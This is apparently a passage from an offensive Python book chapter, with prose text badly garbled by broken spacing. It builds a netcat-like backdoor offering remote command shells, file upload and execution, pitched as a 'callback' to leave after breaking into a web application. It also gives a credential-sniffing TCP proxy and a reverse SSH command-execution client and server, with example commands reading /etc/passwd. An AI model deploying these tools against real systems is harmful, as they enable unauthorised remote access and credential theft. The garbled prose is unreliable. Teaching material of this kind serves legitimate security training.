Netc at i s th e u ti lity k nife o f n etw ork in g, s o i t’ s n o s u rp ris e th at s h re w d s y ste m s a d m in is tr a to rs r e m ove
it f r o m th eir s y ste m s. O n m ore th an o ne o ccasio n, I ’ v e r u n i n to s e rv ers th at d o n o t h av e n etc at
in sta lle d b ut d o h av e P yth o n. I n th ese c ase s, i t’ s u se fu l to c re ate a s im ple n etw ork c lie nt a nd s e rv er
th at y o u c an u se to p ush f ile s, o r to h av e a l is te ner th at g iv es y o u c o m mand -lin e a ccess. I f y o u’v e
bro ken i n th ro ugh a w eb a p plic ati o n, i t i s d efin ite ly w orth d ro ppin g a P yth o n c allb ack to g iv e y o u
se co nd ary a ccess w ith o ut h av in g to f ir s t b urn o ne o f y o ur tr o ja ns o r b ackd oors . C re ati n g a to ol l ik e
th is i s a ls o a g re at P yth o n e xerc is e , s o l e t’ s g et s ta rte d .
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
Here , w e a re j u st i m porti n g a ll o f o ur n ecessa ry l ib ra rie s a nd s e tti n g s o m e g lo bal v aria b le s. N o
heav y l ifti n g q uite y et.
Now l e t’ s c re ate o ur m ain f u ncti o n r e sp onsib le f o r h and lin g c o m mand -lin e a rg um ents a nd c allin g th e
re st o f o ur f u ncti o ns.
➊ def usage():
print "BHP Net Tool"
print
print "Usage: bhpnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for
incoming connections"
print "-e --execute=file_to_run - execute the given file upon
receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a
file and write to [destination]"
print
print
print "Examples: "
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options

➋ try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",
["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin?
➌ if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
➍ server_loop()
main()
We b egin b y r e ad in g i n a ll o f th e c o m mand -lin e o pti o ns
➋ a nd s e tti n g th e n ecessa ry v aria b le s
dep end in g o n th e o pti o ns w e d ete ct. I f a ny o f th e c o m mand -lin e p ara m ete rs d on’t m atc h o ur c rite ria ,
we p rin t o ut u se fu l u sa ge i n fo rm ati o n
➊ . I n th e n ext b lo ck o f c o de
➌ , w e a re tr y in g to m im ic n etc at
to r e ad d ata f r o m s td in a nd s e nd i t a cro ss th e n etw ork . A s n o te d , i f y o u p la n o n s e nd in g d ata
in te ra cti v ely , y o u n eed to s e nd a
CTR L
-D to b yp ass th e s td in r e ad . T he f in al p ie ce
➍ i s w here w e
dete ct th at w e a re to s e t u p a l is te nin g s o cket a nd p ro cess f u rth er c o m mand s ( u p lo ad a f ile , e xecute a
co m mand , s ta rt a c o m mand s h ell) .
Now l e t’ s s ta rt p utti n g i n th e p lu m bin g f o r s o m e o f th ese f e atu re s, s ta rti n g w ith o ur c lie nt c o de. A dd
th e f o llo w in g c o de a b ove o ur
main
f u ncti o n.
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target,port))

➊ if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
➋ while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
# wait for more input
➌ buffer = raw_input("")
buffer += "\n"
# send it off
client.send(buffer)
except:
print "[*] Exception! Exiting."
# tear down the connection
client.close()
Most o f th is c o de s h o uld l o ok f a m ilia r to y o u b y n o w . W e s ta rt b y s e tti n g u p o ur T C P s o cket o bje ct
and th en te st
➊ to s e e i f w e h av e r e ceiv ed a ny i n p ut f r o m s td in . I f a ll i s w ell, w e s h ip th e d ata o ff to
th e r e m ote ta rg et a nd r e ceiv e b ack d ata
➋ u nti l th ere i s n o m ore d ata to r e ceiv e. W e th en w ait f o r
fu rth er i n p ut f r o m th e u se r
➌ a nd c o nti n ue s e nd in g a nd r e ceiv in g d ata u nti l th e u se r k ills th e s c rip t.
The e xtr a l in e b re ak i s a tta ched s p ecific ally to o ur u se r i n p ut s o th at o ur c lie nt w ill b e c o m pati b le
with o ur c o m mand s h ell. N ow w e’ll m ove o n a nd c re ate o ur p rim ary s e rv er l o op a nd a s tu b f u ncti o n
th at w ill h and le b oth o ur c o m mand e xecuti o n a nd o ur f u ll c o m mand s h ell.
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler,
args=(client_socket,))
client_thread.start()
def run_command(command):
# trim the newline
command = command.rstrip()

# run the command and get the output back
try:
➊ output = subprocess.check_output(command,stderr=subprocess.
STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
By n o w , y o u’re a n o ld h and a t c re ati n g T C P s e rv ers c o m ple te w ith th re ad in g, s o I w on’t d iv e i n to th e
server_loop
f u ncti o n. T he
run_command
f u ncti o n, h o w ev er, c o nta in s a n ew l ib ra ry w e h av en’t
co vere d y et: th e
subprocess
l ib ra ry .
subprocess
p ro vid es a p ow erfu l p ro cess-c re ati o n i n te rfa ce
th at g iv es y o u a n um ber o f w ays to s ta rt a nd i n te ra ct w ith c lie nt p ro gra m s. I n th is c ase
➊ , w e’re
sim ply r u nnin g w hate v er c o m mand w e p ass i n , r u nnin g i t o n th e l o cal o pera ti n g s y ste m , a nd r e tu rn in g
th e o utp ut f r o m th e c o m mand b ack to th e c lie nt th at i s c o nnecte d to u s. T he e xcep ti o n-h and lin g c o de
will c atc h g eneric e rro rs a nd r e tu rn b ack a m essa ge l e tti n g y o u k no w th at th e c o m mand f a ile d .
Now l e t’ s i m ple m ent th e l o gic to d o f ile u p lo ad s, c o m mand e xecuti o n, a nd o ur s h ell.
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
➊ if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
➋ while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
➌ try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to
%s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" %
upload_destination)
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested

➍ if command:
while True:
# show a simple prompt
client_socket.send(" ")
# now we receive until we see a linefeed
(enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
Our f ir s t c hunk o f c o de
➊ i s r e sp onsib le f o r d ete rm in in g w heth er o ur n etw ork to ol i s s e t to r e ceiv e a
file w hen i t r e ceiv es a c o nnecti o n. T his c an
be u se fu l f o r u p lo ad -a nd -e xecute e xerc is e s o r f o r
in sta llin g m alw are a nd h av in g th e m alw are r e m ove o ur P yth o n c allb ack. F ir s t w e r e ceiv e th e f ile d ata
in a l o op
➋ to m ake s u re w e r e ceiv e i t a ll, a nd th en w e s im ply o pen a f ile h and le a nd w rite o ut th e
co nte nts o f th e f ile . T he
wb
f la g e nsu re s th at w e a re w riti n g th e f ile w ith b in ary m ode e nab le d , w hic h
ensu re s th at u p lo ad in g a nd w riti n g a b in ary e xecuta b le w ill b e s u ccessfu l. N ext w e p ro cess o ur
execute f u ncti o nality
➌ , w hic h c alls o ur p re v io usly w ritte n
run_command
f u ncti o n a nd s im ply s e nd s
th e r e su lt b ack a cro ss th e n etw ork . O ur l a st b it o f c o de h and le s o ur c o m mand s h ell
➍ ; i t c o nti n ues to
execute c o m mand s a s w e s e nd th em i n a nd s e nd s b ack th e o utp ut. Y ou’ll n o ti c e th at i t i s s c annin g f o r a
new lin e c hara cte r to d ete rm in e w hen to p ro cess a c o m mand , w hic h m akes i t n etc at- fr ie nd ly .
How ev er, i f y o u a re c o nju rin g u p a P yth o n c lie nt to s p eak to i t, r e m em ber to a d d th e n ew lin e
chara cte r.

Kic k in g t h e T ir e s
Now l e t’ s p la y a ro und w ith i t a b it to s e e s o m e o utp ut. I n o ne te rm in al o r
cmd.exe
s h ell, r u n o ur
sc rip t l ik e s o :
justin$
./bhnet.py -l -p 9999 -c
Now y o u c an f ir e u p a no th er te rm in al o r
cmd.exe
, a nd r u n o ur s c rip t i n c lie nt m ode. R em em ber th at
our s c rip t i s r e ad in g f r o m s td in a nd w ill d o s o u nti l th e E O F ( e nd -o f- file ) m ark er i s r e ceiv ed . T o s e nd
EO F, h it
CTR L
-D o n y o ur k eyb oard :
justin$
./bhnet.py -t localhost -p 9999


ls -la
total 32
drwxr-xr-x 4 justin staff 136 18 Dec 19:45 .
drwxr-xr-x 4 justin staff 136 9 Dec 18:09 ..
-rwxrwxrwt 1 justin staff 8498 19 Dec 06:38 bhnet.py
-rw-r--r-- 1 justin staff 844 10 Dec 09:34 listing-1-3.py

pwd
/Users/justin/svn/BHP/code/Chapter2

You c an s e e th at w e r e ceiv e b ack o ur c usto m c o m mand s h ell, a nd b ecause w e’re o n a U nix h o st, w e
can r u n s o m e l o cal c o m mand s a nd r e ceiv e b ack s o m e o utp ut a s i f w e h ad l o gged i n v ia S SH o r w ere
on th e b ox l o cally . W e c an a ls o u se o ur c lie nt to s e nd o ut r e q uests th e g o od, o ld -fa sh io ned w ay:
justin$
echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | ./bhnet.
py -t www.google.com -p 80
HTTP/1.1 302 Found
Location: http://www.google.ca/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/
accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Wed, 19 Dec 2012 13:22:55 GMT
Server: gws
Content-Length: 218
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

302 Moved

302 Moved


The document has moved
here.

[*] Exception! Exiting.
justin$
There y o u g o ! I t’ s n o t a s u p er te chnic al te chniq ue, b ut i t’ s a g o od f o und ati o n o n h o w to h ack to geth er
so m e c lie nt a nd s e rv er s o ckets i n P yth o n a nd u se th em f o r e v il. O f c o urs e , i t’ s th e f u nd am enta ls th at
yo u n eed m ost: u se y o ur i m agin ati o n to e xp and o r i m pro ve i t. N ext, l e t’ s b uild a T C P p ro xy, w hic h i s
use fu l i n a ny n um ber o f o ffe nsiv e s c enario s.

Build in g a T C P P ro xy
There a re a n um ber o f r e aso ns to h av e a T C P p ro xy i n y o ur to ol b elt, b oth f o r f o rw ard in g tr a ffic to
bounce f r o m h o st to h o st, b ut a ls o w hen a sse ssin g n etw ork -b ase d s o ftw are . W hen p erfo rm in g
penetr a ti o n te sts i n e nte rp ris e e nv ir o nm ents , y o u’ll c o m monly b e f a ced w ith th e f a ct th at y o u c an’t r u n
Wir e sh ark , th at y o u c an’t l o ad d riv ers to s n iff th e l o opback o n W in d ow s, o r th at n etw ork
se gm enta ti o n p re v ents y o u f r o m r u nnin g y o ur to ols d ir e ctl y a gain st y o ur ta rg et h o st. I h av e e m plo yed a
sim ple P yth o n p ro xy i n a n um ber o f c ase s to h elp u nd ers ta nd u nkno w n p ro to co ls , m odify tr a ffic b ein g
se nt to a n a p plic ati o n, a nd c re ate te st c ase s f o r f u zze rs . L et’ s g et to i t.
import sys
import socket
import threading
def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind((local_host,local_port))
except:
print "[!!] Failed to listen on %s:%d" % (local_host,local_
port)
print "[!!] Check for other listening sockets or correct
permissions."
sys.exit(0)
print "[*] Listening on %s:%d" % (local_host,local_port)
server.listen(5)
while True:
client_socket, addr = server.accept()
# print out the local connection information
print "[==>] Received incoming connection from %s:%d" %
(addr[0],addr[1])
# start a thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler,
args=(client_socket,remote_host,remote_port,receive_first))
proxy_thread.start()
def main():
# no fancy command-line parsing here
if len(sys.argv[1:]) != 5:
print "Usage: ./proxy.py [localhost] [localport] [remotehost]
[remoteport] [receive_first]"
print "Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True"
sys.exit(0)
# setup local listening parameters
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
# this tells our proxy to connect and receive data
# before sending to the remote host
receive_first = sys.argv[5]

if "True" in receive_first:
receive_first = True
else:
receive_first = False
# now spin up our listening socket
server_loop(local_host,local_port,remote_host,remote_port,receive_first)
main()
Most o f th is s h o uld l o ok f a m ilia r: w e ta ke i n s o m e c o m mand -lin e a rg um ents a nd th en f ir e u p a s e rv er
lo op th at l is te ns f o r c o nnecti o ns. W hen
a f r e sh c o nnecti o n r e q uest c o m es i n , w e h and i t o ff to o ur
proxy_handler
, w hic h d oes a ll o f th e s e nd in g a nd r e ceiv in g o f j u ic y b its to e ith er s id e o f th e d ata
str e am .
Let’ s d iv e i n to th e
proxy_handler
f u ncti o n n o w b y a d din g th e f o llo w in g c o de a b ove o ur
main
fu ncti o n.
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
# connect to the remote host
remote_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
remote_socket.connect((remote_host,remote_port))
# receive data from the remote end if necessary
➊ if receive_first:
➋ remote_buffer = receive_from(remote_socket)
➌ hexdump(remote_buffer)
# send it to our response handler
➍ remote_buffer = response_handler(remote_buffer)
# if we have data to send to our local client, send it
if len(remote_buffer):
print "[<==] Sending %d bytes to localhost." %
len(remote_buffer)
client_socket.send(remote_buffer)
# now lets loop and read from local,
# send to remote, send to local
# rinse, wash, repeat
while True:
# read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
print "[==>] Received %d bytes from localhost." % len(local_
buffer)
hexdump(local_buffer)
# send it to our request handler
local_buffer = request_handler(local_buffer)
# send off the data to the remote host
remote_socket.send(local_buffer)
print "[==>] Sent to remote."
# receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):

print "[<==] Received %d bytes from remote." % len(remote_buffer)
hexdump(remote_buffer)
# send to our response handler
remote_buffer = response_handler(remote_buffer)
# send the response to the local socket
client_socket.send(remote_buffer)
print "[<==] Sent to localhost."
# if no more data on either side, close the connections
➎ if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print "[*] No more data. Closing connections."
break
This f u ncti o n c o nta in s th e b ulk o f th e l o gic f o r o ur p ro xy. T o s ta rt o ff, w e c heck to m ake s u re w e d on’t
need to f ir s t i n iti a te a c o nnecti o n to th e r e m ote s id e a nd r e q uest d ata b efo re g o in g i n to o ur m ain l o op
➊ . S om e s e rv er d aem ons w ill e xp ect y o u to d o th is f ir s t ( F T P s e rv ers ty p ic ally s e nd a b anner f ir s t,
fo r e xam ple ). W e th en u se o ur
receive_from
f u ncti o n
➋ , w hic h w e r e use f o r b oth s id es o f th e
co m munic ati o n; i t s im ply ta kes i n a c o nnecte d s o cket o bje ct a nd p erfo rm s a r e ceiv e. W e th en d um p
th e c o nte nts
➌ o f th e p acket s o th at w e c an i n sp ect i t f o r a nyth in g i n te re sti n g. N ext w e h and th e o utp ut
to o ur
response_handler
f u ncti o n
➍ . I n sid e th is f u ncti o n, y o u c an m odify th e p acket c o nte nts ,
perfo rm f u zzin g ta sk s, te st f o r a uth enti c ati o n i s su es, o r w hate v er e ls e y o ur h eart d esir e s. T here i s a
co m plim enta ry
request_handler
f u ncti o n th at d oes th e s a m e f o r m odify in g o utb ound tr a ffic a s w ell.
The f in al s te p i s to s e nd th e r e ceiv ed b uffe r to o ur l o cal c lie nt. T he r e st o f th e p ro xy c o de i s
str a ig htf o rw ard : w e c o nti n ually r e ad f r o m l o cal, p ro cess, s e nd to r e m ote , r e ad f r o m r e m ote , p ro cess,
and s e nd to l o cal u nti l th ere i s n o m ore d ata d ete cte d
➎ .
Let’ s p ut to geth er th e r e st o f o ur f u ncti o ns to c o m ple te o ur p ro xy.
# this is a pretty hex dumping function directly taken from
# the comments here:
# http://code.activestate.com/recipes/142812-hex-dumper/
➊ def hexdump(src, length=16):
result = []
digits = 4 if isinstance(src, unicode) else 2
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa,
text) )
print b'\n'.join(result)
➋ def receive_from(connection):
buffer = ""
# We set a 2 second timeout; depending on your
# target, this may need to be adjusted
connection.settimeout(2)
try:
# keep reading into the buffer until
# there's no more data
# or we time out
while True:

data = connection.recv(4096)
if not data:
break
buffer += data
except:
pass
return buffer
# modify any requests destined for the remote host
➌ def request_handler(buffer):
# perform packet modifications
return buffer
➍ # modify any responses destined for the local host
def response_handler(buffer):
# perform packet modifications
return buffer
This i s th e f in al c hunk o f c o de to c o m ple te o ur p ro xy. F ir s t w e c re ate o ur h ex d um pin g f u ncti o n

th at w ill s im ply o utp ut th e p acket d eta ils w ith b oth th eir h exad ecim al v alu es a nd A SC II- p rin ta b le
chara cte rs . T his i s u se fu l f o r u nd ers ta nd in g u nkno w n p ro to co ls , f in d in g u se r c re d enti a ls i n p la in te xt
pro to co ls , a nd m uch m ore . T he
receive_from
f u ncti o n
➋ i s u se d b oth f o r r e ceiv in g l o cal a nd
re m ote d ata , a nd w e s im ply p ass i n th e s o cket
obje ct to b e u se d . B y d efa ult, th ere i s a tw o-s e co nd
ti m eo ut s e t, w hic h m ig ht b e a ggre ssiv e i f y o u a re p ro xyin g tr a ffic to o th er c o untr ie s o r o ver l o ssy
netw ork s ( in cre ase th e ti m eo ut a s n ecessa ry ). T he r e st o f th e f u ncti o n s im ply h and le s r e ceiv in g d ata
unti l m ore d ata i s d ete cte d o n th e o th er e nd o f th e c o nnecti o n. O ur l a st tw o f u ncti o ns
➌ ➍ e nab le y o u
to m odify a ny tr a ffic th at i s d esti n ed f o r e ith er e nd o f th e p ro xy. T his c an b e u se fu l, f o r e xam ple , i f
pla in te xt u se r c re d enti a ls a re b ein g s e nt a nd y o u w ant to tr y to e le v ate p riv ile ges o n a n a p plic ati o n b y
passin g i n
admin
i n ste ad o f
justin
. N ow th at w e h av e o ur p ro xy s e t u p , l e t’ s ta ke i t f o r a s p in .

Kic k in g t h e T ir e s
Now th at w e h av e o ur c o re p ro xy l o op a nd th e s u p porti n g f u ncti o ns i n p la ce, l e t’ s te st th is o ut a gain st
an F T P s e rv er. F ir e u p th e p ro xy w ith th e f o llo w in g o pti o ns:
justin$ sudo ./proxy.py 127.0.0.1 21 ftp.target.ca 21 True
We u se d
sudo
h ere b ecause p ort 2 1 i s a p riv ile ged p ort a nd r e q uir e s a d m in is tr a ti v e o r r o ot p riv ile ges
in o rd er to l is te n o n i t. N ow ta ke y o ur f a v orite F T P c lie nt a nd s e t i t to u se l o calh o st a nd p ort 2 1 a s i ts
re m ote h o st a nd p ort. O f c o urs e , y o u’ll w ant to p oin t y o ur p ro xy to a n F T P s e rv er th at w ill a ctu ally
re sp ond to y o u. W hen I r a n th is a gain st a te st F T P s e rv er, I g o t th e f o llo w in g r e su lt:
[*] Listening on 127.0.0.1:21
[==>] Received incoming connection from 127.0.0.1:59218
0000 32 32 30 20 50 72 6F 46 54 50 44 20 31 2E 33 2E 220 ProFTPD 1.3.
0010 33 61 20 53 65 72 76 65 72 20 28 44 65 62 69 61 3a Server (Debia
0020 6E 29 20 5B 3A 3A 66 66 66 66 3A 35 30 2E 35 37 n) [::ffff:22.22
0030 2E 31 36 38 2E 39 33 5D 0D 0A .22.22]..
[<==] Sending 58 bytes to localhost.
[==>] Received 12 bytes from localhost.
0000 55 53 45 52 20 74 65 73 74 79 0D 0A USER testy..
[==>] Sent to remote.
[<==] Received 33 bytes from remote.
0000 33 33 31 20 50 61 73 73 77 6F 72 64 20 72 65 71 331 Password req
0010 75 69 72 65 64 20 66 6F 72 20 74 65 73 74 79 0D uired for testy.
0020 0A .
[<==] Sent to localhost.
[==>] Received 13 bytes from localhost.
0000 50 41 53 53 20 74 65 73 74 65 72 0D 0A PASS tester..
[==>] Sent to remote.
[*] No more data. Closing connections.
You c an c le arly s e e th at w e a re a b le to s u ccessfu lly r e ceiv e th e F T P b anner a nd s e nd i n a u se rn am e
and p assw ord , a nd th at i t c le anly e xits w hen th e s e rv er p unts u s b ecause o f i n co rre ct c re d enti a ls .

SSH w it h P ara m ik o
Piv oti n g w ith B H NET i s p re tty h and y, b ut s o m eti m es i t’ s w is e to e ncry p t y o ur tr a ffic to a v oid
dete cti o n. A c o m mon m eans o f d oin g s o i s to tu nnel th e tr a ffic u sin g S ecure S hell ( S SH ). B ut w hat i f
yo ur ta rg et d oesn ’t h av e a n S SH c lie nt ( lik e 9 9.8 1943 p erc ent o f W in d ow s s y ste m s)?
While th ere a re g re at S SH c lie nts a v aila b le f o r W in d ow s, l ik e P utty , th is i s a b ook a b out P yth o n. I n
Pyth o n, y o u c o uld u se r a w s o ckets a nd s o m e c ry p to m agic to c re ate y o ur o w n S SH c lie nt o r s e rv er —
but w hy c re ate w hen y o u c an r e use ? P ara m ik o u sin g P yC ry p to g iv es y o u s im ple a ccess to th e S SH 2
pro to co l.
To l e arn a b out h o w th is l ib ra ry w ork s, w e’ll u se P ara m ik o to m ake a c o nnecti o n a nd r u n a c o m mand
on a n S SH s y ste m , c o nfig ure a n S SH s e rv er a nd S SH c lie nt to r u n r e m ote c o m mand s o n a W in d ow s
machin e, a nd f in ally p uzzle o ut th e r e v ers e tu nnel d em o f ile i n clu d ed w ith P ara m ik o to d up lic ate th e
pro xy o pti o n o f B H NET. L et’ s b egin .
Fir s t, g ra b P ara m ik o u sin g p ip i n sta lle r ( o r d ow nlo ad i t f r o m
http ://w ww.p ara m ik o .o rg /
):
pip install paramiko
We’ll u se s o m e o f th e d em o f ile s l a te r, s o m ake s u re y o u d ow nlo ad th em f r o m th e P ara m ik o w eb site
as w ell.
Cre ate a n ew f ile c alle d
bh_ssh cm d.p y
a nd e nte r th e f o llo w in g:
import threading
import paramiko
import subprocess
➊ def ssh_command(ip, user, passwd, command):
client = paramiko.SSHClient()
➋ #client.load_host_keys('/home/justin/.ssh/known_hosts')
➌ client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
➍ ssh_session.exec_command(command)
print ssh_session.recv(1024)
return
ssh_command('192.168.100.131', 'justin', 'lovesthepython','id')
This i s a f a ir ly s tr a ig htf o rw ard p ro gra m . W e c re ate a f u ncti o n c alle d
ssh_command
➊ , w hic h m akes
a c o nnecti o n to a n S SH s e rv er a nd r u ns a s in gle c o m mand . N oti c e th at P ara m ik o s u p ports
auth enti c ati o n w ith k eys
➋ i n ste ad o f ( o r i n a d diti o n to ) p assw ord a uth enti c ati o n. U sin g S SH k ey
auth enti c ati o n i s s tr o ngly r e co m mend ed o n a r e al e ngagem ent, b ut f o r e ase o f u se i n th is e xam ple ,
we’ll s ti c k w ith th e tr a d iti o nal u se rn am e a nd p assw ord a uth enti c ati o n.
Because w e’re c o ntr o llin g b oth e nd s o f th is c o nnecti o n, w e s e t th e p olic y to a ccep t th e S SH k ey f o r
th e S SH s e rv er w e’re c o nnecti n g to
➌ a nd m ake th e c o nnecti o n. F in ally , a ssu m in g th e c o nnecti o n i s
mad e, w e r u n th e c o m mand th at w e p asse d a lo ng i n th e c all to th e
ssh_command
f u ncti o n i n o ur
exam ple th e
command
i d
➍ .
Let’ s r u n a q uic k te st b y c o nnecti n g to o ur L in ux s e rv er:
C:\tmp>
python bh_sshcmd.py
Uid=1000(justin) gid=1001(justin) groups=1001(justin)
You’ll s e e th at i t c o nnects a nd th en r u ns th e c o m mand . Y ou c an e asily m odify th is s c rip t to r u n

multi p le c o m mand s o n a n S SH s e rv er o r r u n c o m mand s o n m ulti p le S SH s e rv ers .
So w ith th e b asic s d one, l e t’ s m odify o ur s c rip t to s u p port r u nnin g c o m mand s o n o ur W in d ow s c lie nt
over S SH . O f c o urs e , n o rm ally w hen u sin g S SH , y o u u se a n S SH c lie nt to c o nnect to a n S SH s e rv er,
but b ecause W in d ow s d oesn ’t i n clu d e a n S SH s e rv er o ut- o f- th e-b ox, w e n eed to r e v ers e th is a nd s e nd
co m mand s f r o m o ur S SH s e rv er to th e S SH c lie nt.
Cre ate a n ew f ile c alle d
bh_ssh R cm d.p y
a nd e nte r th e f o llo w in g:
[ 6 ]
import threading
import paramiko
import subprocess
def ssh_command(ip, user, passwd, command):
client = paramiko.SSHClient()
#client.load_host_keys('/home/justin/.ssh/known_hosts')
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.send(command)
print ssh_session.recv(1024)#read banner
while True:
command = ssh_session.recv(1024) #get the command from the SSH
server
try:
cmd_output = subprocess.check_output(command, shell=True)
ssh_session.send(cmd_output)
except Exception,e:
ssh_session.send(str(e))
client.close()
return
ssh_command('192.168.100.130', 'justin', 'lovesthepython','ClientConnected')
The f ir s t f e w l in es a re l ik e o ur l a st p ro gra m a nd th e n ew s tu ff s ta rts i n th e
while True:
l o op. A ls o
no ti c e th at th e f ir s t c o m mand w e s e nd i s
ClientConnected
. Y ou’ll s e e w hy w hen w e c re ate th e o th er
end o f th e S SH c o nnecti o n.
Now c re ate a n ew f ile c alle d
bh_ssh se rv er.p y
a nd e nte r th e f o llo w in g:
import socket
import paramiko
import threading
import sys
# using the key from the Paramiko demo files
➊ host_key = paramiko.RSAKey(filename='test_rsa.key')
➋ class Server (paramiko.ServerInterface):
def _init_(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
if (username == 'justin') and (password == 'lovesthepython'):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
server = sys.argv[1]
ssh_port = int(sys.argv[2])
➌ try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((server, ssh_port))
sock.listen(100)
print '[+] Listening for connection ...'

client, addr = sock.accept()
except Exception, e:
print '[-] Listen failed: ' + str(e)
sys.exit(1)
print '[+] Got a connection!'
➍ try:
bhSession = paramiko.Transport(client)
bhSession.add_server_key(host_key)
server = Server()
try:
bhSession.start_server(server=server)
except paramiko.SSHException, x:
print '[-] SSH negotiation failed.'
chan = bhSession.accept(20)
➎ print '[+] Authenticated!'
print chan.recv(1024)
chan.send('Welcome to bh_ssh')
➏ while True:
try:
command= raw_input("Enter command: ").strip('\n')
if command != 'exit':
chan.send(command)
print chan.recv(1024) + '\n'
else:
chan.send('exit')
print 'exiting'
bhSession.close()
raise Exception ('exit')
except KeyboardInterrupt:
bhSession.close()
except Exception, e:
print '[-] Caught exception: ' + str(e)
try:
bhSession.close()
except:
pass
sys.exit(1)
This p ro gra m c re ate s a n S SH s e rv er th at o ur S SH c lie nt ( w here w e w ant to r u n c o m mand s) c o nnects
to . T his c o uld b e a L in ux, W in d ow s, o r e v en O S X s y ste m th at h as P yth o n a nd P ara m ik o i n sta lle d .
For th is e xam ple , w e’re u sin g th e S SH k ey i n clu d ed i n th e P ara m ik o d em o f ile s
➊ . W e s ta rt a s o cket
lis te ner
➌ , j u st l ik e w e d id e arlie r i n th e c hap te r, a nd th en S SH in iz e i t
➋ a nd c o nfig ure th e
auth enti c ati o n m eth o ds
➍ . W hen a c lie nt h as a uth enti c ate d
➎ a nd s e nt u s th e
ClientConnected
messa ge
➏ , a ny c o m mand w e ty p e i n to th e
bh_ssh se rv er
i s s e nt to th e
bh_ssh clie n t
a nd e xecute d o n
th e
bh_ssh clie n t
, a nd th e o utp ut i s r e tu rn ed to
bh_ssh se rv er
. L et’ s g iv e i t a g o .

Kic k in g t h e T ir e s
For th e d em o, I ’ ll r u n b oth th e s e rv er a nd th e c lie nt o n m y W in d ow s m achin e ( s e e
Fig ure 2 -1
).
Fig ure 2 -1 . U sin g S SH to r u n c o m mands
You c an s e e th at th e p ro cess s ta rts b y s e tti n g u p o ur S SH s e rv er
➊ a nd th en c o nnecti n g f r o m o ur
clie nt
➋ . T he c lie nt i s s u ccessfu lly c o nnecte d
